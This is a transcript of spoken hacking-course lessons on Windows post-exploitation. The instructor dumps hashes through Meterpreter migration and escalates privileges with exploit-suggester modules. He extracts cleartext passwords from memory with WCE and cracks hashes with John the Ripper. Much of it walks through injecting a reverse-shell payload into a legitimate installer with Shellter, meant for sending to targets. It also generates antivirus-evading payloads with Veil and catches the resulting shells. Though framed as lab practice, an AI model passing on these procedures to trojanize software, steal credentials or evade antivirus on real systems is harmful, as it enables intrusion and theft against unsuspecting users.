exploit it. Right, now I can able to perform the privilege escalation here. Right, the interpreter session to open. If I type here bg, okay, and just type here sessions, here you guys can able to see that 2 sessions are there. I just need to check which one is a, this is a new session, right? The previous one is id 1. Let me see this one. Okay, session, let me interact with the id 2 and just type here shell. Right now it's a administrator. Okay, exit. Right, and just type here help. Now see what will happen. Here I can able to see the hash dump. Let me dump the hashes here. I can't able, still I can't able to dump. Now the thing is, just see, if I type here sysinfo, you guys can able to see our window interpreter architecture is the payload is what, 86-bit, and our this guy, our target architecture is 64-bit. Maybe this kind of error, right? Because my payload is 86-bit, so that's why it can't able to dump the passwords there. At that time, I'm gonna perform the migration here. Simple, you know, right? Just type here ps and perform the migration here. Okay, let me change to svc host. Okay, see, let me tell you one thing, guys. These are the different groups. Okay, local services is there, network system services is there. Okay, basically these are the different groups. Right, now let me do one thing, let me migrate to NT authority system. Okay, the svc host. Now let me jump to this one, 2556. Right, now simple, just type here migrate and just paste it here. Now just type sysinfo. See, maybe the architecture has been changed. Yes, it's changed. It says 64-bit right now. Now just type here help again. Let me type here hash dump. See, right now I can able to dump the passwords there. Okay, this is a thing. Whenever you see this kind of error, just play with it. Okay, don't be panic there. If you are not getting also, just try to do this stuffs. Okay, see, every group is a different stuffs here. Okay, in the PS, whenever you just a PS, everything is different there. See, it will take a huge time to explain this all stuffs. Okay, but the simple things, again I am saying, it's a very simple thing. Okay, if you want to migrate something, just first of all just try to target the system. Okay, because whenever I just target the network services, then the things will completely change there. Okay, yes, just do it. Okay, just let me show you that one also. Right now I just dumped the hashes. Let me copy this hashes and let me save this, because to crack this stuffs. Okay, create document, hash create, and just type, just paste it here and save. Let's go back here, sorry, here. All right, now just see, if I type ps, the things are completely changed. Okay, see, I can, the previous stuffs I can't able to see. See, in the previous, when I just type ps, see the results there. Okay, first there is a smss is there, maybe PowerShell is there. Okay, in the last there is a PowerShell. Maybe let me check the PowerShell is there or not here. Okay, you can also type the pgrip there. See, the things are completely changed because you just navigate to another stuffs there. Okay, another user as a anti-authority system. Okay, now what if I migrate to anti-authority network services? Okay, this one, let me target this svc host here. This is also administrator. Just see, it's a system 32-bit. Okay, see here, if you want to migrate to this folder, just say temp, then you just need to choose this one. If you want to migrate to explorer.exe, just choose this one. If you want to migrate to system 32-bit svc host, and choose this one. This is how the things are working here. Okay, see, there is a system root is there. If you want to migrate to here, simple, you just need to use this one. Okay, now let me, what I told you, let me migrate to low network, I think, right? Local network services. Okay, what is id here? 1768. Just type here migrate. Okay, now just type here ps again. See, the things are completely changed. Now if I type here sysinf get uid, there is a anti-authority network services. If I type here help and let me dump the hash dump. Okay, just type here hash dump. Here you guys can't able to capture the passwords because it's a different stuffs. Okay, it's a different user where it doesn't have the password. You need to think like this. Okay, sorry guys. If I navigate to this one, then again I need to go back. Okay, I need to select the anti-authority or system, then I need to do the whole process there. Okay, so this is a thing. So the simple thing is, you no need to worry here. Just try to jump to anti-authority system and just and migrate to svc host or explorer or something like that. Okay, a target a migrate to trusted applications. Okay, basically this one explorer.exe is a trusted one, svc host is a trusted one. Just migrate to that one. Okay, so right now we successfully dumped the password of windows 7. You guys do the same process for windows 10 as well. Okay, this is the thing. Let me close this and let me dump the password of this one as well. Okay, where it is, metasploitable 3. The same issue you will see, okay, here also. Let me close this one because I don't want this. Let me set up the whole listener. I just closed that one. And let me log in as an administrator here. Now, if I click on the downloads, there is a payload, right? There is a Shika. Let me run this. See, it will execute as an administrator because this is an administrator user, okay? I got the connection. Just type here what? Sys info. First of all, you need to check architecture is 86-bit. Okay. Help. Just type here hash dump. It can't able to dump the hashes here, okay? If I type here get system, I'm not using suggester here, simple. Because it's a vulnerable system, so that's why I'm using this one, okay? Just type here get system. Okay, it's successfully performed the steps there. And let me type here hash dump. Still, it can't able to perform the hashes. It can't able to dump the hashes. Let me migrate to 64-bit, okay? Let me change my meter payload architecture to what? 64-bit. Just type here PS. Let me target the 64-bit application, which is in NT authority system. There is a, just let me see. Con system is let me migrate to Ruby, okay? What is this? ID 4140. The application, the Ruby application architecture is what? X64-bit, okay? Now just type here migrate. Migrate. Just paste the number there. Just type enter. Okay. Now just type here sysinfo. Right now my meter architecture is 64-bit. Now simple, just type here help. Let me type here hash dump. It will work. See? Let me copy it. Even after performing the privilege escalation, due to this architecture issue, I can't able to dump the passwords. Okay, this is a thing. So that's why I didn't cover this all stuffs in the beginning. Okay, because you will get kind of confusions. Okay. So this is a very easy process. You no need to worry. Again, I am saying you just need to migrate to any 64-bit application. Okay, after performing the privilege escalation, just migrate to any 64-bit application. Okay, then you guys can able to do the steps. Okay, now let me show you this. Let me show this here only. Okay. Close, save. Now in the next class I'm gonna teach you how you guys can able to dump the Windows hashes from memory. Okay, it's a very easy steps. Okay, and also you guys can able to dump the clear text passwords as well. Right now this is in hash format. You guys can also dump the clear text passwords there. Okay, so let me show you that one as well. In this class, you will learn how to dump Windows hashes from memory. And I'm gonna teach you how you guys can also dump the clear text passwords. Okay. Now, first of all, this is my Windows target system. First of all, let me hack this. Okay. Just type here exploit. I got session. If I type here, sorry guys, sysinfo. It's a 86-bit Windows. I need to change it. Okay. Now simple and another thing is if I type here get UID, here you guys can able to see it's a local admin. Okay, it's a different user in this system. Basically in my domain server there is a different systems out there. Okay, let me explain you. This is a very important for you. See, basically we just in the last classes we see, right, there is a NT authority forward slash local services. It's a nothing but it's a different users, okay, it's a different user and say different groups. Okay, here you guys can able to see there is a domain computer is there. This is a nothing but this is a different it's a groups or users. Okay, yes, this is a thing. So here you guys can able to see local admin is there. Right now I just log in as a local admin. So this is a thing basically, right? Whenever you see, don't be confused there. Okay, whenever you just type the PS there, here you guys can able to see, okay, let me type here PS. Here you guys can able to see window white check local admin is there. Okay, so simple, I can migrate to any other 64-bit application. Okay, so let me migrate to this one first, explorer.ext. In majority of cases you guys can able to see svc host and explorer.ext, and you guys can also migrate to any other application. It totally depend upon you. See, right now I can't able to migrate to svc host because it doesn't give any kind of detail. So let me migrate to explorer.exe. Okay, just type here 6680 migrate, what is it, 6680. Okay, let me paste it here. It successfully migrated sysinfo. Here you guys can able to see, right? If I type help, if I type here hashdom, I can't able to perform the stuffs there. Okay, simple. Just type here bg for background. Sorry, bg for background. See, this is a basic things. Okay, let me tell you, this is a basic things. But in red teaming, we just cover each and everything. Okay. Now, just type here back and just search for suggester. Right here it is. Just type here use 0. Now just type here show options. So what is the session ID there? It's 2, right? 2. Just type here exploit. I just told you, you need to do the whole the same process for any Windows systems. Okay, so that's why again I am doing in front of you. See, right now my target is what? Windows 10, right? Here you guys can able to see the different vulnerabilities here, which is exploit Windows. This one. Okay, let me use this one to perform the privilege escalation. Bypass.NET profiler. Just type here back. Okay, and just type here use this one, show options, and here is a session. Just type here session, sorry, set session to what, 2, right? Okay, and you just need to change the L port. Let me change it to 6677. Just type exploit. Now in Windows 10, see here you guys can able to see this exploit requires manual cleanup of this one. Basically at that time you just need to remove the logs by just typing the clear env is there, right? Simple, just use it. It successfully Meterpreter session 3 opened. Okay, if I type here bg, okay, and just type here back, sorry, just type here sessions, show sessions. Here there is a another stuff is another system has been opened with the this one. Okay, 3. Just let me interact with it. Okay, sessions 3. Right now I am interacting with session 3, which is a administrator. If I type here help, if I type here hashdom, see if it doesn't work, there is another way is there. Okay, simple, I can able to dump the hashes right now. If you want to dump create text passwords, or if you want to dump the anti-LM hashes, there is another method is there. Okay, I just told you, if the method doesn't work, we have the different method. Okay, let me show you, right? See, right now I am targeting the Metasploitable 3, right? In the last classes I did the whole process on Windows 10. The same process you can do it on the Windows 10 or 11 systems. Okay, now here the simple thing is, first of all, let me type here shell. Okay, right now I'm an administrator. Okay, let me type here exit. See, just open the your file manager in your Linux. Okay, and there is a user is there. In user there is a one folder is there with the name of share. In share there is a Windows resources folder is there. Okay, just open that one, and there is a WCE is there. In WCE there is a some exes are there. Okay, like VC 32-bit and VC 64-bit. You can use any of this one. See, my target system is Windows 64-bit, right? I just told you in the last class. We can also execute the 32-bit application in my 64-bit architecture system. Okay, but let me tell you, in 32-bit Windows system, you can't execute the 64-bit. Okay, this is the thing. Now let me do one thing. Let me upload this on my target system. Okay, let me see. Just type here upload. I'm uploading from my Kali Linux to my target system. Okay, let me upload the 32-bit. If it doesn't work, I'm gonna upload the 64-bit. Okay, just type enter. Now if I type here dir, here you guys can able to see in WCE, right? Okay, here it is, WCE 32-bit. Okay, it's successfully uploaded. Sorry guys, just type here shell. Now again we all know that it's successfully uploaded. Okay, simple, just type again dir. Now you guys can able to see the use stuffs. Simple, you just need to see the WCE. Okay, here it is, WCE32.exe. Now simple, just type here WCE32.exe. Okay, and just type -h. Now here you guys can able to see -l for list logon sessions and NTLM. Let me tell you, it will only grab the NTLMs of the sessions who are log on there. Okay, and change NTLM credentials of current logon session. Just ignore this all shifts. We just covered this by using the different tools in red teaming. There is a, I just told you, right? In this classes we are dumping the hashes from memory by using this one. Just simple, you just need to execute like this, WCE 32.exe and add the flag there -l. Here you guys can just wait, it will take some time to dump the anti-LM. Just wait. Okay, I just use the flag. Which flag I just used? I use this one -l to list login sessions and NTLM credentials. Okay, right now, just wait. Let me show the. Let me see this one. Okay, the output. Still, it's taking some time. Let me type enter here. Okay, it's taking some time. Let me. Okay. I just terminated that one because it's taking some a huge time. Shell again. Let me type that WCEE32 and let me type -v here to dump the create text passwords. It's not showing the output, means I'm gonna upload the this one, okay, Win64 vc64.exe. Okay, let me do one thing, let me upload that one only. Sometimes it will give this kinds of error. Just let me upload the 64-bit one because my target system is what, 64-bit. Okay, so it's successfully uploaded. Now just type here shell and just type here wce64.exe -h for help. Here you guys can able to see the output. Now just type here wce 64bit.exe and just type -shell. Okay, right now it's dumping the credentials. Let me tell you guys, this one is a which hash. This is in anti-LM format. Okay, now let me dump the create text passwords as well. Just type here WC is 64-bit. Just type here -v to dump the create text passwords. Okay, sorry, it's for verbose. To dump the create text passwords, I just need to use this one. Okay, okay, 64.exe and here is a dump create text password -w. So here you guys can able to see I successfully dumped the create text password. Here is the administrator and the password is Vagrant. Okay, and here there is a SSD server Vagrant and the password is d something like this. Okay, now the thing is why we are doing means in some cases what will happen means in the gray box pen testing or some in the majority of cases in the gray box pen testing, you just need to dump the password of other users. Okay, this is the thing. Okay, again I am saying in some cases if you can't able to dump the password by using the hash dump, you guys can also use this method. Okay, to dump the password, basically it's dumping see, it's dumping the hashes and passwords from where, it's dumping from memory. Okay, this is the thing. Now the simple thing is, see, there are two stuffs are there for WC32 and WC64. Okay, you can also use a universal will work on both 64 and 32-bit. Okay, yes, this is a thing. Hope you guys enjoy these classes. Thank you, have a nice day. Hello everyone, hope you are fine. In this class I'm gonna teach you how you guys can able to crack these hashes. In this classes we are using the John the Ripper because this tool is very easy to use. Okay, so that's why we're gonna use this tool. There are different tools out there such as Hashcat is there. Okay, and there is a air crack is there. So simple, you guys can use any tool. Okay, it's totally depend upon you. Right now for this class, let me use the John the Ripper. This is the hashes which we gather from the last the from Windows 7 Metasploitable and this one Windows 10. Okay, now here you guys can able to see this hashes are in NTLM format and this is in hash format. Okay, let me copy this and let me paste it on my Linux system. Right now the previous one has been it's having some issues, so that's why it's updating. Okay, so that's why I'm using the different Linux machine here. Right now, simple, no need to worry here. In this classes we are using John the Ripper. Okay, here is a tool John. Okay, this is a tool which we are using right now. Okay, and the thing is for this class you need a word list. Okay, how you guys can able to find the word list? See, by default John have its own word list. Okay, but sometimes we need to specify the word list. Okay, in majority of cases we need to specify the word list there. Okay, or so the thing is I'm gonna teach you the whole steps. Okay, how you guys can able to specify the word list, each and everything. Now simple, just type here here it is. This cup is a tool, okay, which is very excellent to generate the word list, which I just cover in the Wi-Fi hacking series. And here is okay, this one, sec list. This is a, if you click on the sec list, here you guys can able to see the all the word lists which are useful to crack the hashes. Like let me show you. Passwords are there. So here is a list, okay, you guys can use any list here. It's totally depend upon you. See sorry guys, default credentials are there. Basically, if you find any kind of FTP or MySQL, then you guys can able to download this one and you guys perform the attack. And there is a RawQ is there, 2023 file, which is around, I think it's around 6 GB. It's a 50 MB, which is a 2016 one. Here it is. From here you guys can able to download this one. I think he didn't add it. Okay, here it is. Let me click here. See, it's around 4.19 GB. You can also use this one, but if you are using RawQ, then you need to use the latest one. Okay, so that's why what I did means in real world scenarios, checklist is very excellent. Okay, because where it is, checklist. So here it is, right? Because here you guys can able to see for payloads are there. Okay, to perform fuzzing, for HTML, SSL injection, everything is there. So that's why for me checklist is very important. Okay, in my case, but it's totally depend upon you guys. You guys, sorry guys, you guys can also generate your own by using the cup tool. Okay, now simple thing is, let me use this one, and let me tell you one thing guys. Here there is a file system is there, right? In file system there is a user is there. In user there is a share. In share, you here you guys can able to see the folder with the name of word list. So here you guys can able to see the word list as well. See, this is a default word list which was used by John. Okay, and this is a rawq.txt. Let me extract to desktop. Right, here it is. So simple thing is, what you need to do to crack the hashes. See, John is very easy tool to use this all stuffs. Okay, simple, just type the John here, and you guys can also specify the word list. To specify the word list, just type here -- word list. Okay, is equal, and just drag and drop your word list. In my case, the word list is John rawq.txt. Then you just need to drag and drop your this one, the hash file. Okay, simple, type enter here. See, it successfully cracked the password. Okay, so this is the thing. Simple, see here, it's saying that use the format is equal anti at that time. Simple, just type here -- format. Just let me copy that one only. Okay, so see, it's cracked the user is what, the vagrant, and the password sorry, for administrator this is a user and this is the password. Okay, for administrator user, the password is vagrant, and there is a something like C_3 PO or something is there. This is a password. Now the simple thing is, what if I use a default word list of John? Okay, right now I'm not specifying anything. Simple, what I did means I just type the John here and I just drag and drop my hashes, which is in encrypted format. I just pasted there and I just added the format. You no need to worry about this format. Okay, why? Because it will whenever you just didn't add any kind of format, it will automatically the John will tell you that use this format. Okay, sometimes still it can able to crack. Right now maybe it's okay, it doesn't crack here. Simple, the thing is at that time what you need to do, simple, just add the format here. Okay, it's a very easy thing. Just try to do a huge practice there. Okay, now just type enter. See, right now just see, I didn't specify any kind of stuffs there. Okay, I didn't specify any word list there. Still by I just told you there is a two stuffs there. Okay, John use by default word list. Okay, which is in this location, user share John under forward slash password dot lst. It's using this one. Okay, so it will take some time to crack the password. So here is it. Sorry guys, it will take some time. Okay, now let me crack this one. Sorry, NTLM one. Okay, simple, just let me stop this. Okay, just drag and drop this one and just type dash dash. Okay, let me add the word list. Okay, dash dash word list is equal, just let me drag and drop this one, just type enter. It can't able to crack, loaded two password hashes. Maybe I need to use a different word list here. Okay, so let me do one thing, let me use a by default word list of John. See, it's totally, the game is totally depend upon the word list. Okay, so it is very easy to get the hashes, but to crack that hash it will take a huge time. In majority in government agencies, these guys what they do means they set up the huge graphic cards. Okay, so simple, they see whenever you have a in hashcat. Okay, basically majority of people use a hashcat. Okay, to crack the password, this hashes. At that time what they do means they add the huge amount of graphic cards. Okay, like you see in Bitcoin mining, how they add the graphic cards. Okay, simple, same the same setup they do, like any private agencies, government agencies, something like that. Simple, they got this kind of encrypted chips and they do the whole process within hours. Okay, see, now just assume that you guys just see ROCU file having more than its size is 4 GB, right? So for our normal computers, it will take a days, months, years. Okay, to crack that. But for them, it's like a minutes. Okay, so this is the thing. Just type enter. Right now, I am using the by default one of the John, the word list of this John. See, it's using this word list. Let me see the let me show you that one. It's in user share John. User share control F John. Sorry, the spelling is wrong. User share control F, man. John. See, here is a John the Ripper. Okay, it will take it's taking some time. So to crack password, it will take some time. You need to wait. Okay. Here is a John. Double click it. Here you guys can able to see there is a something like pass.lst or something. Maybe it's a different folder. So leave it, okay? It's having some issue with it. It's a little bit slow. Just see the processor. See, whenever you just start the cracking, just check the processor. It will. It's using 51, 52 or 54 or something like that. Where after, see, assume that I just stopped this one. Now see, processor will be down. Right now it's at 2% usage. So this is how you guys can able to crack the password. See, it's taking some time to crack. The same thing, the same output you guys can able to see like that, okay? Like this. Simple, you just need to add the hashes here, and you no need to worry about the format. Simple, it will automatically show you the thing which you need to use. Simple, just add the flag there. That's it, okay? It will automatically crack the passwords here, okay? Hope you guys enjoy these classes. Thank you. Have a nice day. So guys, hope you're fine. In this class, I'm gonna teach you how you guys can able to inject the payload in other applications, okay? Now the simple thing is, in this classes we are using this tool Shelter, okay? See, here it is. This is official website of Shelter, okay? Here you guys can able to see what is it, okay? Shelter is a dynamic shellcode injection tool or dynamic PE infector. It can be used in order to inject shellcode into native Windows applications. Currently 32-bit apps only. Just ignore it. Simple. You no need to worry about this all stuffs, okay? Why it's written like 32-bit or something like that, okay? Now the shellcode can be something yours or something generated through a framework such as Metasploit. Shelter takes advantage of a original structure of the PE file and doesn't apply any modifications such as changes in memory access permission in section unless user want to. Adding the extra sections with RWE access and whatever would look .gi under an AV scan. Shelter is just an EPO infector that tries to find a location to insert an instruction to redirect execution to the payload. Unlike any other infector, Shelter advanced infection engine never transfers the execution flow to the code cave or to an added section in the infected PE file. Let me tell you, if your target, just assume that I want to inject my Metasploit payload with VMware, okay? Now just think that I just injected the VMware is packed, okay? VMware using such kind of it's using any kind of packing, then I can't able to inject it, okay? This is the thing. So you need to target that applications which are not secure, which are not packed, such as there are a lot of applications are there, which I'm gonna show you that one. Just target small applications. Target, see, whenever if you want to target any company, what they use, FileZilla or something like that, right? So just target such applications, okay? There is a FTP client file transfer is there. Just target this kind of applications, okay? SSH is there, PuTTY is there, okay? Now the simple thing is, let me show you how we can able to download this one. This is the official website. From here you guys can able to see, first of all, for this you need to update your Linux system, okay? To update it, just type apt get update. You just need to run it as a sudo. Maybe it will take some time. It's successfully updated. Now let's go back. Let's copy the second command here. Sorry, this one, apt get install Shelter. Just paste it here and just type enter. You just need to run it as a sudo here. Just type y. Now it will take some time to install this one, okay? Let me tell you one thing, guys. Without typing apt get update, don't execute this command, or else you will get a errors there, okay? So first of all, you just need to update, then you just need to execute the command there, okay? So it's around 100 MB. Just let me pause the video, right? So I got the error here. So let me do one thing. Let me execute the same command again, okay? Just type here shelter dash y. Now it will continue from the same percent, okay? Now it's successfully installed. Now it's successfully installed. Simple, just type here shelter. So you need to wait. Now what happened, man? It's installing Wine. So it having some problem. I need to install this one. Let me type here sudo shelter. If it doesn't work, then let me install manually, right? Okay, no problem. Simple. First command is this. Simple, copy this one and paste it here. Okay, you just need to execute this as a sudo. Okay, successfully executed. Now the second command is this one, apt-get update. Sorry, again sudo. Now the third command is what? This one. So we are doing each and every process manually, okay? Basically what will happen means it will automatically install each and everything, but I don't know why right now it's giving some errors. Successfully updated. Now let's paste the tut command here. Simple, again sudo. And now just type y here. It will take around 5 minutes to install this all chefs. So let's wait. Right. Now simple, just type here sudo shelter. Enter. It's saying that Wine could not load. Okay, let me restart it. Let me type shelter. Okay, could sorry guys, could not load kernel 32.dll. Okay, let me try to fix it. See here, he got the same error. To fix this, here we got the answer. It's due to misconfiguration. Simple, you just need to move this one, okay? Just copy this command. Sorry guys. Now simple, just paste it here. Right. Then if it doesn't work, then I'm gonna do this one. Just type here shelter. Now it's working. So it's working, right? See, it is very easy to use. You no need to worry here, okay? Now simple, here choose operation mode. Just type here auto. Yeah. Now P target. Just choose your target. In my case, just see, let me tell you, just choose such applications which are in small size and which is useful. Okay, like there is a FTP file shell is there. Okay, if you are targeting any company, just target such kind of applications like SSA putty is there. Okay, such applications. In my case, what I am doing means I am targeting the CPU Z here. So here it is, and there is a zip is there. Let me download this one. So it's around 2 MB. Okay, now simple, just let me drag and drop on desktop. Okay, now let me rename it because the name is very long. Just type here simple, let me rename it to CPU Z dot rename. Now simple, you just need to page the location of your target. Simple, your target application. Simple, click on properties. Here you guys can able to see the location. Copy this location and simple, click on edit, click on paste. Just type the forward slash and just type here CPU Z dot exe. Just enter. uh, disassembler.dll was successfully created successfully. See, it will take some time, so you need to wait. Then it will show you the option enable stealth mode. Simple, just type here Y, enter. Now these are the payloads. Okay, in the whole classes we just use a meterpreter reverse TCP. At that time, simple, use a listed payload or a custom. Simple, just type here. For custom you just need to type C. For listed, just type L here and select a payload by index. Just type here the payload number. Okay, a number is 1 here, just type 1. Now you just need to set up your L host here. Okay, in my case, let me type here, let me see here. I just type ifconfig. Here is my IP address. Okay, just copy it. Simple, edit, paste. Just type enter. Now the port, just let me type here 4444. Now it will take some time. Code generated. Yes, it's successfully done. Let me tell you, if you are using a huge application, a big applications, or a application which have the security, like whenever the developer develop the application, he pack that applications. Okay, so it will avoid the decompiling. We can't able to decompile that application because the developer packed that application by using different algorithms or by using the different softwares, so that we can't able to bind with that softwares. Okay, there is a methods out there to unpack that softwares, but it is out of concept. Okay, so the simple thing is just type enter here. That's it, we successfully binded our application. Right now here the same application, okay, it doesn't create any new one or something like that. It will inject the payload in the same application. Okay, you just need to send this application to your target. Okay, now simple, just open the terminal. Just first of all, let me send this to my target system. Okay, you can also target to your Windows 10 or something like that. Okay, Let me paste it. Just type enter. I think it's running somewhere. Okay, it's running. So that's why it's not working. Okay, now simple. Let's go back here. Let me open the browser here. Let me refresh it. There is a CPU Z is there. I just targeted the 7-zip as well. Due to the packing, I can't able to inject in it. Okay, there is a CPU Z is there, right? Now this is our payload. Now the thing is, you just need to listen for connections. Okay, just clear this and just type here MSF console. Simple. Thus the things are there. Use exploit multi-handler, set payload, which we just used there in shelter, and set helport to 4444, set lhost to my Linux IP. Simple. Just type here exploit. Right, let's go back. Sorry, not this one, this one. Just run it. Yes, I accept, I agree. Next, next, next. Install, finish, just close. Let's go back here. I got the connection. This is the thing. Okay, it's maybe it's dead. Just wait. Exploit. Let me run this. See, I got the connection. First, it show the pop-up of this one. Okay, Metasploit, I think. So this is the thing. This is how you guys can able to bind your payload. It's installed, right? Okay. Now if I type here sysinfo, you guys can able to see it's a 86-bit. Just migrate it. Okay. This is the thing. In this class, I'm gonna teach you how you guys can able to generate advanced payloads by using while framework. Okay. Now the simple thing is to install this. There is a some simple commands are there. Okay, apt -y install wheel. Before doing this whole stuff, first of all, you just need to update your Linux system. Okay, apt get update. Just type enter. I just need to run it as a sudo kali. Then just copy this command and paste it there. See, by using this wheel, you guys can able to bypass the antiviruses. Okay. Just let me copy it. Okay, it will take some time. Let me pause the video. Right, simple. Let's paste that command apt-y wheel. Just simple. Just type here sudo. I think it's already there. I just installed because it will take a huge time, so that's why I already installed that wheel. Now the simple thing is just copy the second command, which is this one, and simple paste it here. It's already there. Okay, let me stop this one. Okay, you just need to execute as a sudo and just paste that. Just type enter. See what is force and silent. Just if you go back here, sorry guys, here you guys can able to see --4. If somebody goes wrong, sorry, if something goes wrong, this will override detecting any previous installs, useful when there is a setup package update. And silent, this will perform an unattended installation of everything as it sorry guys, as it will automate all the steps, so there is a no interaction for user. So this is the thing. So it will take some time. It will take around 15 to 20 minutes. Okay, it's totally depend upon your internet connection. Just wait. So you no need to worry. It will it's gonna automatically install each and everything. You no need to type anything, or you just you no need to click there. Okay, like next or something like that. So don't worry about this error. Just ignore it. See here I am talking. I'm talking about this one. Don't worry about this also. Okay. Now here simple. Just type Kali. There was issue installation the following. Just ignore it. Now simple. Just type here whale. If you see output, that means you successfully install this one. See, basically wheel is nothing but it's the same like MSF Venom. To generate payload we use MSF Venom, right, in Metasploit. It's same like that, but it's little bit advanced because it will generate the uh, this encrypted payloads to bypass, which is helpful to bypass the antiviruses. Okay, like there are we can't able to bypass the famous antiviruses. Okay, like some normal antiviruses we can able to bypass it. To bypass the famous antiviruses, you just need to use the cryptors or some other tools, or you just need to change the variables there, and you just need to edit the script data. You just need to edit that. Okay, the scripts and the variables or something like that. So this is the thing basically. By using this, you guys can able to bypass, again I am saying, uh, such antiviruses which are not famous. Okay, now here is a available tools. There is Aviation, and see, we just install this tool only for Aviation. Okay, you can also use this one as well. And here there is a available commands are there, which is exit, info, list, option, update, use for specific tool, update to update this tool, the whale. And there is a option show a whale configurations, and there is a list available tool. Okay, now simple thing is, let me type here use, and let me use the Aviation. Just type here 1, and here there are 41 payloads are there. Simple, just type here list. See, list available payloads. If you type list here, that means to list available payloads. Just type enter here. See, there are different payloads are there. This payload is written in C, CS, Go. There is a PowerShell, Perl, Lua, and Python. Now you can also use this Python one. Okay, basically you no need to just let me tell you, you no need to worry that. Assume that right now let me select the Python one. Okay, just don't think like that. Majority of people will think that in our target system, what if the Python is not installed, then he can't able to execute it, right? So at that time, the simple thing is, you just need to compile the payload to what, to exe. Okay, then it will work. Now in this classes, let me target the PowerShell. Basically this is my target system. Okay, this is my target system, is using Windows. I can also choose the Python, but I need to compile it. Okay, to compile it I need to fix a huge stuff there. Okay, so that's why let me use the PowerShell meter reverse TCP. In the last classes from beginning we are using the reverse TCP. Okay, meter reverse TCP. Let me use this one only. Okay, just type here use PowerShell meter reverse TCP. The number is 22. Just type here enter. Here you guys can able to see, just set the L host here. The L port is, let me set the by default 4444. There is a username sleep. You can also use this commands. Just see the descriptions here. Okay, now let me open the terminal here and just type here ifconfig, and this is my IP address. Just let me copy it, and simple, just type here set lhost and just paste it here. Okay, and simple, to generate the payload, just copy this generate command and simple paste it here. Just type enter. Now what name you need to give to this to your payload. Let me name it as a power up. Okay, now it's successfully generated. See, it doesn't compile because it's a bat script. Okay, so simple, you just need to send this to your victim. If he execute this by using the PowerShell, then you will get the access. Okay, now here just see Metasploit resources file returned to this one. Basically this is a very important file. Let me show you why it is important. See, again I am saying, I just forget it to tell one say one thing. The simple thing is, see, we are generating using the we are generating the payload using the whale. Okay, but we will listen for connection using Metasploit, the MSF console only. Okay, so let me show you practically how the things are working here. First of all, let me navigate to this folder, which is just let me copy this one, and just let me open the terminal here, or let me open the file manager. Open folder, and there is a file system. In file system, there is a var. In var there is a what lib is there. In lib there is a wheel. Just control F, just type here wheel. Here it is, and there is a output. Where is output? Here is output, and there is a source. In source there is a power up dot bat is there. Now let me paste it on my target system. Okay, sorry, on my desktop. Let's close this one. Don't close this terminal. Simple. Let me open let me continue from this terminal only. Just type here. First of all, let me send this bat file to my target system. Simple. Just type here cd desktop, and just type here python 3-m http dot server. Now let's go back to my target system, and let me refresh this. Let me hit enter here. Why I can't able to access this? I think I just typed the wrong IP. Sorry. If config, it's a 183. So here it is. There is a power up dot bat is there. Okay. Simple. Let's listen for the connection. Okay, let me stop this, and let's type here msf console -q. Now simple, just type here use exploit exploit multi / handler. Right, now simple, let me do one thing. See here, there is a resources file user, okay, which is for Metasploit. You no need to set up like set payload or set lhost or something like that. Simple, you just need to use this one. Okay, just copy the location here, just copy this location, and simple, just type here resource, and simple paste that location. It will automatically set each and everything for you. Okay, this is a thing. Now let's go back here, and let's execute the payload. Where it is? Here it is. Okay, just double click it and run it. Let's go back here. See, I got the shell here. Now the thing is, you guys can also generate the payload in exe format as well. How to do that? Let me show you. Just type here list, and there is for CMD, I think there is a not for CM go is a Lua per. Okay, you can also generate this in Python, but the thing is, it's giving some issue with PyInstaller. So at that time, the same process to generate the payload for this as well, but you need to manually compile it. Okay, to compile it, you guys can also watch some YouTube videos. Just take the Python file. Just let me show you. Use 28, which is this one. Just type enter and set lhost. Okay, and simple, let me generate. Let me name it as a Pi 667. Okay, see, To compile this, it's using the PyInstaller. If I type here 1, okay, just type enter. See, it will give some errors here. Okay, you can also fix it, or majority in cases it is some kind of confusions. To fix it, it will take a huge time. See, what I'm gonna do means, after fixing this whole stuff, I'm gonna create the another video for you and I'm gonna update it. Okay, the simple thing is, if you can't able to fix this issue at that time, what you need to do, simple. See, here is a source code. Remember, just see here, there is a source code written to here. Okay, just navigate to this one. Just let me open the file manager, file system, and here you guys can able to see var, and there is a lib, and there is a, just control F, while, okay, sorry guys, there is a output, and here is a source. In source there is a py667.py is there. You need to compile this Python file. How to compile? Let me cover that one as well. Now in this class I'm gonna teach you how you guys can able to compile this Python file. Okay, right now I just created another payload because I just closed that one. Okay, so that's why, let me what I did the whole process again. Okay, the same thing, and I just given the name to compile fix. And here is our just see, I just selected the PyInstaller, it doesn't work, and here is the source code of my payload. Okay, at that time what you need to do, simple, just visit the source code, just visit this folder, just open this one, simple, just let me close it, let me do it again, open folder. Now simple, just paste the location here. Okay, now here is a compile fix.py is here. Now if I sorry guys, if I open this, here you guys can able to see the source code. Okay, you can also change the stuffs here, it's totally depend upon you. Now the thing is, how you guys can able to compile this. First of all, open the terminal and just type here apt install PyInstaller. Okay, let's do it manually. Okay, sudo apt install PyInstaller, just type Kali there, the password. Now it's already there in my system, so you need to install this. After installing this, what you need to do means, let's compile it to exe. Simple, to compile it, just open the terminal from here only. Just let me open terminal here, just type here ls. Here you guys can able to see compile fix.py is there, which is our payload. Let's compile it to exe. To compile it, just type here PyInstaller. Okay, just type here the Python your Python file name. Okay, compile fix.py, and just type here dash one file, just type enter. Now here you guys can able to see here is the thing, I successfully compiled this stuffs. Okay, it's under source dist folder. Okay, source, there is a dist, and it's a, here it is. Okay, now let's send this to my target system, to my Windows 10. Okay, just let me drag and drop on desktop. You can also use this file to listen for connection. Okay, let me listen manually. Okay, like by just typing the metasploit msf, just let me do it. Okay, the hell man, just type here cd, and let me close this one. Okay, now let me stop this one. From here, let me share this file to my Windows system. Okay, just type here python 3 -m http.server Let's go back here. And what happened? Now let's go back. So here is our the exe compile flicks. Just let me download this one. Sorry, the thing is I didn't add it. We didn't added the extensions there. Just let me rename it and let me add it. Okay, exe. Here it is. Let me do it again. Here it is. Now it's successfully downloaded. Right. Simple. I just pasted this on my desktop. Let's go back here. Let me listen for the connection. Now simple. Let me do the same stuff. Use exploit multi-handler and just let's set up the payload. Set lhost. Set lport to 4444 and simple exploit. Now let's go back here. Just execute this one. Still it's executing. If I go back here, okay, run anyway. Okay, it's having some problem due to this compilation. The simple thing is if you get any kind of problem or something, sorry guys, let me navigate to this one again. This one, let me here. Here is a build. Let me do one thing. Let me build this on my Windows system. Okay, you can also do this whole process on your Windows as well. You guys can able to compile this Python file in Windows as well. Okay, but you need to do this whole process on your own system. Okay, don't do this whole process on your target system, right? The simple thing is just having just let me do it, okay, on my Windows system. To do it, simple, just go back to your Windows. Assume that this is my own system. Okay, now let's compile. Where it is? 